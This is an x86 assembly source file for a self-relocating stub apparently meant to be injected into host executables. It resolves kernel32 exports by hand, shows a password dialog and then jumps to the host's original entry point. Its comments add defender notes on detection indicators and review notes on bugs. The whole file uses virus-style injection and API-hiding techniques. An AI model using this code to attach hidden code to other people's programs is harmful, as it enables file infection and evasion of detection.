.386
.model flat, stdcall
option casemap:none
include windows.inc
.code
;-----------------------------------------------------------------------
; main — self-relocating payload entry point.
; Target: x86-32, flat model, stdcall (declared at the top of the file).
; No import table is used: kernel32's base is derived from the return
; address on the stack (see GetKernelBase), LoadLibraryA/GetProcAddress
; are pulled out of kernel32's export table by hand (GetAIPAddress), and
; every other API is resolved through those two.  All data references
; below go through esi, which holds (runtime address - assembled address)
; after the call/pop pair, so the block runs at any load address.
; Register roles: esi = relocation delta for the whole of main
;                 eax = scratch / last resolved address
;                 edx = pointer argument being pushed
; Defender note: return-address-based kernel32 discovery, a manual
; export-table walk and API names kept as plain strings in the data area
; are the characteristic footprint of this kind of injected code; the
; strings themselves (see the data block) are direct detection material.
;-----------------------------------------------------------------------
main:
call VIROUS                             ; pushes the runtime address of VIROUS
VIROUS: pop esi                         ; esi = runtime address of VIROUS
sub esi, offset VIROUS                  ; esi = runtime - assembled = relocation delta
; [esp] is still main's own return address (the call/pop above left the
; stack balanced); it is assumed to point into kernel32.
push [esp]
call GetKernelBase
mov [esi + aKernel32Base], eax          ; NULL if the scan failed — not checked here
; resolve LoadLibraryA from kernel32's export table
lea edx, [esi + szLoadLibraryA]
push edx
push eax                                ; eax still = kernel32 base
call GetAIPAddress
mov [esi + aLoadLibraryA], eax
; resolve GetProcAddress
lea edx, [esi + szGetProcAddress]
push edx
push [esi + aKernel32Base]
call GetAIPAddress
mov [esi + aGetProcAddress], eax
; resolve GetModuleHandleA
lea edx, [esi + szGetModuleHandleA]
push edx
push [esi + aKernel32Base]
call GetAIPAddress
mov [esi + aGetModuleHandleA], eax
; resolve ExitProcess
lea edx, [esi + szExitProcess]
push edx
push [esi + aKernel32Base]
call GetAIPAddress
mov [esi + aExitProcess], eax
; GetModuleHandleA(NULL) -> base of the host executable, used as hInstance
push NULL
call [esi + aGetModuleHandleA]
mov [esi + aModuleHandle], eax
; LoadLibraryA("user32.dll")
lea edx, [esi + szUser32]
push edx
call [esi + aLoadLibraryA]
mov [esi + aUser32Handle], eax
; From here on the real GetProcAddress is used for every user32 export.
; resolve SetWindowLongA
lea edx, [esi + szSetWindowLongA]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aSetWindowLongA], eax
; resolve GetMessageA
lea edx, [esi + szGetMessageA]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aGetMessageA], eax
; resolve TranslateMessage
lea edx, [esi + szTranslateMessage]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aTranslateMessage], eax
; resolve DispatchMessageA
lea edx, [esi + szDispatchMessageA]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aDispatchMessageA], eax
; resolve DefWindowProcA (stored but never called in this file)
lea edx, [esi + szDefWindowProcA]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aDefWindowProcA], eax
; resolve DestroyWindow
lea edx, [esi + szDestroyWindow]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aDestroyWindow], eax
; resolve GetDlgItemTextA
lea edx, [esi + szGetDlgItemTextA]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aGetDlgItemTextA], eax
; resolve CreateWindowExA
lea edx, [esi + szCreateWindowExA]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aCreateWindowExA], eax
; resolve CallWindowProcA
lea edx, [esi + szCallWindowProcA]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aCallWindowProcA], eax
; resolve ShowWindow
lea edx, [esi + szShowWindow]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aShowWindow], eax
; CreateWindowExA for the top-level "dialog" (class "#32770" = dialog class).
; stdcall pushes right-to-left: lpParam, hInstance, hMenu, hWndParent,
; nHeight=160, nWidth=250, y=200, x=300, dwStyle, lpWindowName, lpClassName, dwExStyle.
push NULL
push [esi + aModuleHandle]
push NULL
push NULL
push 160
push 250
push 200
push 300
; WS_DLGFRAME appears twice in the style mask (harmless). Do not put a
; comment on the next line: the trailing backslash is a line continuation.
push WS_DLGFRAME or WS_SYSMENU or WS_VISIBLE or WS_POPUPWINDOW or WS_CLIPCHILDREN\
or WS_DLGFRAME or DS_3DLOOK or DS_FIXEDSYS or DS_MODALFRAME
lea edx, [esi + szCaption]
push edx
lea edx, [esi + szClassName]
push edx
push WS_EX_CONTROLPARENT or WS_EX_DLGMODALFRAME
call [esi + aCreateWindowExA]
mov [esi + aWnd], eax                   ; return value not checked for NULL
; Child controls. hMenu carries the control id; the dialog proc keys on it.
; NOTE(review): WS_EX_NOPARENTNOTIFY is an *extended* style but is OR'ed
; into dwStyle for every child below, so its bit lands in the class-specific
; style field (BS_*/SS_*/ES_*) — confirm the rendered controls are intended.
; Button id 101 ("OK"): x=40 y=80 w=50 h=25
push NULL
push [esi + aModuleHandle]
push 101
push [esi + aWnd]
push 25
push 50
push 80
push 40
push WS_VISIBLE or WS_CHILD or WS_TABSTOP or WS_EX_NOPARENTNOTIFY
lea edx, [esi + szOK]
push edx
lea edx, [esi + szButton]
push edx
push NULL
call [esi + aCreateWindowExA]
; Button id 100 ("Cancel"): x=150 y=80 w=50 h=25
push NULL
push [esi + aModuleHandle]
push 100
push [esi + aWnd]
push 25
push 50
push 80
push 150
push WS_VISIBLE or WS_CHILD or WS_TABSTOP or WS_EX_NOPARENTNOTIFY
lea edx, [esi + szCancel]
push edx
lea edx, [esi + szButton]
push edx
push NULL
call [esi + aCreateWindowExA]
; Static id 3 (prompt text): x=30 y=35 w=90 h=25
push NULL
push [esi + aModuleHandle]
push 3
push [esi + aWnd]
push 25
push 90
push 35
push 30
push WS_VISIBLE or WS_CHILD or WS_TABSTOP or WS_EX_NOPARENTNOTIFY
lea edx, [esi + szPassWord]
push edx
lea edx, [esi + szStatic]
push edx
push NULL
call [esi + aCreateWindowExA]
; Edit id 4 (ES_PASSWORD, masked input): x=120 y=30 w=90 h=25 — read back
; by the dialog proc with GetDlgItemTextA(hWnd, 4, ...)
push NULL
push [esi + aModuleHandle]
push 4
push [esi + aWnd]
push 25
push 90
push 30
push 120
push WS_VISIBLE or WS_CHILD or ES_PASSWORD or WS_TABSTOP or WS_EX_NOPARENTNOTIFY
push NULL
lea edx, [esi + szEdit]
push edx
push WS_EX_CLIENTEDGE
call [esi + aCreateWindowExA]
; Subclass the window: SetWindowLongA(hWnd, GWL_WNDPROC, &_MyDialogProc + delta).
; The old procedure is kept so unhandled messages can be forwarded.
lea edx, [esi + _MyDialogProc]
push edx
push GWL_WNDPROC
push [esi + aWnd]
call [esi + aSetWindowLongA]
mov [esi + aOriWndProc], eax
; ShowWindow(hWnd, nCmdShow).
; NOTE(review): the arguments look swapped — eax (the old window procedure
; returned by SetWindowLongA) is pushed as nCmdShow and 1 as hWnd. The
; window was created with WS_VISIBLE, so the call's failure is invisible.
push eax
push 1
call [esi + aShowWindow]
; Standard message loop: GetMessageA(&msg, NULL, 0, 0) until it returns 0.
; NOTE(review): GetMessageA returns -1 on error; only 0 leaves the loop.
_MsgLoop:
push 0
push 0
push NULL
lea edx, [esi + msg]
push edx
call [esi + aGetMessageA]
cmp eax, 0
jz _ExitMsgLoop
lea edx, [esi + msg]
push edx
call [esi + aTranslateMessage]
lea edx, [esi + msg]
push edx
call [esi + aDispatchMessageA]
jmp _MsgLoop
_ExitMsgLoop:
; Disabled alternative ending (MessageBoxA, then hand-off to the host's
; original entry point). In this version the hand-off happens inside
; _MyDialogProc once the password matches; aMessageBoxA is not defined here.
;push MB_OK or MB_ICONINFORMATION
;lea edx, [esi + szCaption]
;push edx
;lea edx, [esi + szMsg]
;push edx
;push 0
;call [esi + aMessageBoxA]
;mov eax, [esi + Old_ImageBase]
;add eax, [esi + Old_AddressOfEntryPoint]
;push eax
; The stack is balanced (all callees are stdcall), so this returns to
; whoever called main.
ret
;********************************************************************
; DWORD GetKernelBase(DWORD dwKernelRet)
; Purpose: locate the in-memory image base of kernel32.dll.
; In:      dwKernelRet = the return address found at [esp] when the
;          program started; assumed to lie inside kernel32.
; Out:     eax = image base, or NULL if the scan hits the lower bound.
; Clobb:   eax, flags (esi/edi are saved/restored by 'uses').
; Method:  round the address down to a 64 KiB boundary, then walk
;          backwards one 64 KiB block at a time until a block starts
;          with "MZ" and the dword at e_lfanew (offset 3Ch) points at "PE".
; NOTE(review): every probe dereferences [edi] with no exception guard,
;   so an unmapped block faults the process.
; NOTE(review): the "return address is inside kernel32" assumption is
;   specific to the Windows versions this was written for — confirm.
;********************************************************************
GetKernelBase proc uses esi edi dwKernelRet:DWORD
local @BaseAddr:DWORD
mov @BaseAddr, NULL                     ; default result: not found
mov edi, dwKernelRet
and edi, 0FFFF0000h                     ; align down to 64 KiB (DLL bases are 64 KiB aligned)
.while TRUE
.if word ptr [edi] == IMAGE_DOS_SIGNATURE        ; "MZ" at block start?
mov esi, edi
add esi, [esi + 03ch]                   ; esi = base + e_lfanew
.if word ptr [esi] == IMAGE_NT_SIGNATURE         ; "PE" there too -> found
mov @BaseAddr, edi
.break
.endif
.endif
dec edi                                 ; step into the previous block ...
xor di,di                               ; ... and realign to its 64 KiB boundary
.if edi < 70000000h                     ; give up below 70000000h (treated as the lowest plausible base)
.break
.endif
.endw
mov eax, @BaseAddr
ret
GetKernelBase endp
;**********************************************************************
; DWORD GetAIPAddress(DWORD hModule, DWORD szApiName)
; Purpose: resolve an exported function by name straight from a module's
;          in-memory export table (a hand-rolled GetProcAddress; used on
;          kernel32 before the real one is available).
; In:      hModule   = image base of the module
;          szApiName = NUL-terminated name, compared case-sensitively
; Out:     eax = function address, or 0 if the name is not exported
; Clobb:   eax, flags (ebx/ecx/edx/esi/edi saved/restored by 'uses')
; Limits:  forwarded exports are not followed (the forwarder string's
;          address would be returned); a module with NumberOfNames == 0
;          still executes the .repeat body once before the check.
;**********************************************************************
GetAIPAddress proc uses ebx ecx edx esi edi hModule:DWORD, szApiName:DWORD
LOCAL dwReturn: DWORD
LOCAL dwApiLength: DWORD
mov dwReturn, 0
; dwApiLength = strlen(szApiName) + 1 — the terminator is included in the
; compare below so that a prefix ("Foo" vs "FooEx") does not match.
mov esi, szApiName
mov edx, esi
_GetStrLen:
cmp byte ptr [esi], 0
jz _CmpExit
inc esi
jmp _GetStrLen
_CmpExit:
sub esi, edx
inc esi
mov dwApiLength, esi
; esi = IMAGE_NT_HEADERS (base + e_lfanew)
mov esi, hModule
add esi, [esi + 03ch]
assume esi: ptr IMAGE_NT_HEADERS
; edi = &DataDirectory[0] = IMAGE_DIRECTORY_ENTRY_EXPORT
lea edi, [esi].OptionalHeader.DataDirectory
add edi, 0*sizeof IMAGE_DATA_DIRECTORY
assume edi: ptr IMAGE_DATA_DIRECTORY
; esi = IMAGE_EXPORT_DIRECTORY (RVA -> VA)
mov esi, [edi].VirtualAddress
add esi, hModule
assume esi: ptr IMAGE_EXPORT_DIRECTORY
; Walk the name-pointer table: edx = index, ebx = &AddressOfNames[edx].
xor edx, edx
mov ebx, [esi].AddressOfNames
add ebx, hModule
.repeat
push esi                                ; esi is reused as the compare pointer below
mov ecx, dwApiLength
mov esi, [ebx]                          ; RVA of the current export name
add esi, hModule
mov edi, szApiName
cld
repz cmpsb                              ; compare dwApiLength bytes, terminator included
.if ZERO?
pop esi                                 ; restore export-directory pointer
jmp _Find_Index
.endif
inc edx
add ebx, 4
pop esi
.until edx >= [esi].NumberOfNames
jmp _Exit                               ; not found -> dwReturn stays 0
_Find_Index:
; Index into the name table: (ebx - AddressOfNames) / 4; the ordinal
; table has 2-byte entries, so the byte offset is halved (shr 1) rather
; than recomputed.
sub ebx, hModule
sub ebx, [esi].AddressOfNames
shr ebx, 1
; ebx = &AddressOfNameOrdinals[index]
add ebx, [esi].AddressOfNameOrdinals
add ebx, hModule
; ordinal -> &AddressOfFunctions[ordinal] (4-byte entries)
movzx ebx, word ptr [ebx]
shl ebx, 2
add ebx, [esi].AddressOfFunctions
add ebx, hModule
; function RVA -> VA
mov eax, [ebx]
add eax, hModule
mov dwReturn, eax
_Exit:
mov eax, dwReturn
ret
GetAIPAddress endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; LRESULT _MyDialogProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
; Window procedure installed over the dialog by SetWindowLongA in main.
; It is entered from user32, so the relocation delta is re-derived into
; esi with the same call/pop trick main uses.
;   WM_DESTROY / WM_CLOSE : return if aExit == 10 (password already
;                           accepted), otherwise ExitProcess(0).
;   WM_COMMAND, id 100    : Cancel -> ExitProcess(0).
;   WM_COMMAND, id 101    : OK -> read edit control 4 into szGetPWD and
;                           compare it byte-for-byte (terminator included)
;                           with szPWD; on a match set aExit = 10, destroy
;                           the window and call the host's original entry
;                           point (Old_ImageBase + Old_AddressOfEntryPoint).
;   anything else         : forward to the original window procedure.
; NOTE(review): on the mismatch path (the 'ret' after '.if ZERO?') the
;   'push esi' done before the compare is never popped, so the
;   'uses esi edi' epilogue restores esi/edi from the wrong stack slots
;   and returns corrupted callee-saved registers to user32.
; NOTE(review): szPWD is assembled as all zeros, so as stored an empty
;   entry matches; presumably the value is patched in when this code is
;   attached to a host — confirm.
; NOTE(review): the trailing 'mov eax, 1 / ret' is unreachable: every
;   branch above it returns.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_MyDialogProc proc uses esi edi hWnd,uMsg,wParam,lParam
local @dwStrLength:DWORD
call DProVIROUS
DProVIROUS: pop esi
sub esi, offset DProVIROUS              ; esi = relocation delta
mov eax, uMsg
.if eax == WM_DESTROY || eax == WM_CLOSE
cmp [esi + aExit], 10                   ; 10 = password accepted, host already started
.if ZERO?
ret
.endif
push 0
call [esi + aExitProcess]
ret
.elseif eax == WM_COMMAND
mov eax, wParam
movzx eax, ax                           ; LOWORD(wParam) = control id
.if eax == 100                          ; Cancel button
push 0
call [esi + aExitProcess]
ret
.elseif eax == 101                      ; OK button
; GetDlgItemTextA(hWnd, 4, szGetPWD, 11) — 11 fits the 12-byte buffer
push 11
lea eax, [esi + szGetPWD]
push eax
push 4
push hWnd
call [esi + aGetDlgItemTextA]
; @dwStrLength = strlen(szPWD) + 1 (expected password, terminator included)
lea edi, [esi + szPWD]
mov eax, edi
_GetPWDLen:
cmp byte ptr [edi], 0
jz _CmpPWDExit
inc edi
jmp _GetPWDLen
_CmpPWDExit:
sub edi, eax
inc edi
mov @dwStrLength, edi
; compare szPWD (edi) against the typed text (esi) for @dwStrLength bytes
mov ecx, @dwStrLength
lea edi, [esi + szPWD]
lea eax, [esi + szGetPWD]
push esi                                ; delta saved; esi becomes the compare pointer
mov esi, eax
cld
repz cmpsb
.if ZERO?
pop esi
jmp _PWDRight
.endif
ret                                     ; mismatch: returns with the push above still on the stack
_PWDRight:
mov [esi + aExit], 10                   ; mark accepted so WM_DESTROY below does not ExitProcess
push hWnd
call [esi + aDestroyWindow]
; hand control to the host program's original entry point
mov eax, [esi + Old_ImageBase]
add eax, [esi + Old_AddressOfEntryPoint]
call eax
ret
.endif
; other WM_COMMAND ids: forward to the original window procedure
push lParam
push wParam
push uMsg
push hWnd
push [esi + aOriWndProc]
call [esi + aCallWindowProcA]
ret
.else
; every other message: forward to the original window procedure
push lParam
push wParam
push uMsg
push hWnd
push [esi + aOriWndProc]
call [esi + aCallWindowProcA]
ret
.endif
mov eax, 1
ret
_MyDialogProc endp
; --------------------------------------------------------------------
; Data area. Lives in .code and is written at run time through esi
; (the a* slots below), so the section must be writable for this to
; work — presumably arranged by whatever attaches the code to a host;
; a writable+executable section is itself a detection signal.
; Naming: sz* = NUL-terminated string, a* = resolved address / handle.
; Defender note: the plain API-name strings and the "#32770" class name
; are reliable static indicators for this code.
; --------------------------------------------------------------------
aOriWndProc dd 0                        ; original window procedure (from SetWindowLongA)
aModuleHandle dd 0                      ; host executable base (GetModuleHandleA(NULL))
aUser32Handle dd 0                      ; user32.dll module handle
szUser32 db "user32.dll", 0
aKernel32Base dd 0                      ; kernel32.dll image base (GetKernelBase)
szLoadLibraryA db "LoadLibraryA", 0
aLoadLibraryA dd 0
szGetModuleHandleA db "GetModuleHandleA", 0
aGetModuleHandleA dd 0
szExitProcess db "ExitProcess", 0
aExitProcess dd 0
szGetProcAddress db "GetProcAddress", 0
aGetProcAddress dd 0
szTranslateMessage db "TranslateMessage", 0
aTranslateMessage dd 0
szDispatchMessageA db "DispatchMessageA", 0
aDispatchMessageA dd 0
szGetMessageA db "GetMessageA", 0
szDefWindowProcA db "DefWindowProcA", 0
aDefWindowProcA dd 0                    ; resolved in main but never called
aGetMessageA dd 0
szShowWindow db "ShowWindow", 0
aShowWindow dd 0
szCreateWindowExA db "CreateWindowExA", 0
aCreateWindowExA dd 0
szSetWindowLongA db "SetWindowLongA", 0
aSetWindowLongA dd 0
szDestroyWindow db "DestroyWindow", 0
szGetDlgItemTextA db "GetDlgItemTextA", 0
szCallWindowProcA db "CallWindowProcA", 0
aCallWindowProcA dd 0
aGetDlgItemTextA dd 0
aDestroyWindow dd 0
aWnd dd 0                               ; top-level dialog window handle
aExit dd 0                              ; set to 10 once the password was accepted
msg MSG <0>                             ; message loop buffer
szGetPWD db 0,0,0,0,0,0,0,0,0,0,0,0     ; 12 bytes; GetDlgItemTextA is given 11
szClassName db "#32770", 0              ; system dialog window class
szButton db "Button", 0
szStatic db "Static", 0
szEdit db "Edit", 0
szPassWord db "请输入密码:", 0          ; prompt label ("please enter the password")
szCancel db "取消", 0                   ; "Cancel"
szOK db "确定", 0                       ; "OK"
szCaption db "郭肇禄提醒您输入密码",0   ; window title
szMsg db "这是郭肇禄写的!", 13, 10, 13, 10, "这很好玩吧?", 0   ; only used by the disabled MessageBoxA path
szPWD db 0,0,0,0,0,0,0,0,0,0,0,0        ; expected password; all zeros as assembled (see _MyDialogProc note)
; Host hand-off target: original image base + original entry-point RVA.
; Both are 0 here — presumably filled in when the code is attached to a host.
Old_ImageBase dd 0
Old_AddressOfEntryPoint dd 0
end main